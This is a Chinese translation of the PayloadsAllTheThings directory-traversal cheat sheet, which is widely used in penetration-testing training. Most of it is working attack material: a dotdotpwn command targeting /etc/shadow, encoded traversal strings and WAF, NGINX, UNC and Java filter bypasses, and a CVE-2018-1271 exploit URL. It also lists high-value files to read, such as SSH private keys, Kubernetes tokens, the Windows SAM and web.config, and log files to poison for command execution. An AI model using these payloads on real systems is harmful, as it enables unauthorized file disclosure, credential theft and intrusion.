【翻译】PayloadsAllTheThings——目录穿越 (Directory Traversal)
目录穿越 (Directory Traversal)
本文翻译自:swisskyrepo/PayloadsAllTheThings
在原文基础增加了未提到的利用方法。
github上该项目,同目录下有关目录穿越的Intruder
2022-12-14 翻译第一版
目录和路径穿越存在于利用对用户提供的输入文件名缺乏安全验证/清扫,导致表示“遍历父目录”的字符被传递到文件api的情况。
参考工具
dotdotpwn - https://github.com/wireghoul/dotdotpwn
git clone https://github.com/wireghoul/dotdotpwn
perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b
基础漏洞利用 (Basic exploitation)
我们可以用 ..
访问父目录,下面的字符串是几种编码,可以帮助您绕过实现不佳的过滤器。
../
..\
..\/
%2e%2e%2f
%252e%252e%252f
%c0%ae%c0%ae%c0%af
%uff0e%uff0e%u2215
%uff0e%uff0e%u2216
UTF-16编码 (16 bits Unicode encoding)
. = %u002e
/ = %u2215
\ = %u2216
UTF-8编码 (UTF-8 Unicode encoding)
. = %c0%2e, %e0%40%ae, %c0ae
/ = %c0%af, %e0%80%af, %c0%2f
\ = %c0%5c, %c0%80%5c
绕过"…/"被替换成空 (Bypass “…/” replaced by “”)
有时你会遇到WAF从字符串中删除“…/”字符,仅仅重复就可以解决。
..././
...\.\
使用"…/“和”;"绕过 (Bypass “…/” with “;”)
..;/
http://domain.tld/page.jsp?include=..;/..;/sensitive.txt
双重URL编码 (Double URL encoding)
. = %252e
/ = %252f
\ = %255c
举个例子:
Spring MVC目录遍历漏洞(CVE-2018-1271)
http://localhost:8080/spring-mvc-showcase/resources/%255c%255c..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/..%255c/windows/win.ini
UNC(Universal Naming Convention 统一命名规则)绕过
攻击者可以将Windows UNC共享(‘\UNC\share\name’)注入到软件系统中,从而可能重定向访问非预期位置或任意文件
\\localhost\c$\windows\win.ini
NGINX/ALB的绕过
在特定配置下的NGINX和ALB可以阻止路由中的遍历攻击,例如:http://nginx-server/../../
将返回一个400 bad request
要绕过这种行为,只需在url前加上斜杠
http://nginx-server../../
Java的绕过
绕过Java的URL协议
url:file:///etc/passwd
url:http://127.0.0.1:8080
路径穿越 (Path Traversal)
值得关注的Linux路径
/etc/issue
/etc/passwd
/etc/shadow
/etc/group
/etc/hosts
/etc/motd
/etc/mysql/my.cnf
/etc/apache2/*
/etc/nginx/*
/etc/nginx/conf.d/default.conf
/etc/apparmor(.d)/*
/etc/(cron.d/*|crontab)
/etc/environment
/etc/hostname
/etc/hosts
/etc/issue
/etc/php/*
/etc/mysql/*
/proc/[0-9]*/fd/[0-9]* (first number is the PID, second is the filedescriptor)
/proc/[pid]/maps
/proc/[pid]/net/*
/proc/[pid]/(mounts|mountinfo)
/proc/self/environ
/proc/version
/proc/cmdline
/proc/sched_debug
/proc/mounts
/proc/net/arp
/proc/net/route
/proc/net/tcp
/proc/net/udp
/proc/self/cwd/index.php
/proc/self/cwd/main.py
/home/$USER/.bash_history
/home/$USER/.ssh/id_rsa
/run/secrets/kubernetes.io/serviceaccount/token
/run/secrets/kubernetes.io/serviceaccount/namespace
/run/secrets/kubernetes.io/serviceaccount/certificate
/var/run/secrets/kubernetes.io/serviceaccount
/var/lib/mlocate/mlocate.db
/var/lib/mlocate.db
/var/www/html
/var/lib/php(5)/sessions/
/usr/local/nginx/conf/*
/usr/local/nginx/conf/nginx.conf
[user_dir_you_know]/.bash_history
[user_dir_you_know]/.bashrc
[user_dir_you_know]/.ssh/id_rsa(.pub)
[user_dir_you_know]/.viminfo
值得关注的Windows路径
c:\windows\system32\license.rtf
c:\windows\system32\eula.txt
以下摘自于 https://github.com/soffensive/windowsblindread
c:/boot.ini
c:/inetpub/logs/logfiles
c:/inetpub/wwwroot/global.asa
c:/inetpub/wwwroot/index.asp
c:/inetpub/wwwroot/web.config
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system32/inetsrv/metabase.xml
c:/sysprep.inf
c:/sysprep.xml
c:/sysprep/sysprep.inf
c:/sysprep/sysprep.xml
c:/system volume information/wpsettings.dat
c:/system32/inetsrv/metabase.xml
c:/unattend.txt
c:/unattend.xml
c:/unattended.txt
c:/unattended.xml
c:/windows/repair/sam
c:/windows/repair/system
值得关注的日志文件
以下日志文件是可控的,可以包含在恶意的有效负载中以实现命令执行
/var/log/apache/access.log
/var/log/apache/error.log
/var/log/httpd/error_log
/usr/local/apache/log/error_log
/usr/local/apache2/log/error_log
/var/log/nginx/access.log
/var/log/nginx/error.log
/var/log/vsftpd.log
/var/log/sshd.log
/var/log/mail
靶场 (Labs)
File path traversal, simple case
File path traversal, traversal sequences blocked with absolute path bypass
File path traversal, traversal sequences stripped non-recursively
File path traversal, traversal sequences stripped with superfluous URL-decode
File path traversal, validation of start of path
File path traversal, validation of file extension with null byte bypass
参考 (References)
Path Traversal Cheat Sheet: Windows
Directory traversal attack - Wikipedia
CWE-40: Path Traversal: ‘\UNC\share\name’ (Windows UNC Share) - CWE Mitre - December 27, 2018
NGINX may be protecting your applications from traversal attacks without you even knowing
Directory traversal - Portswigger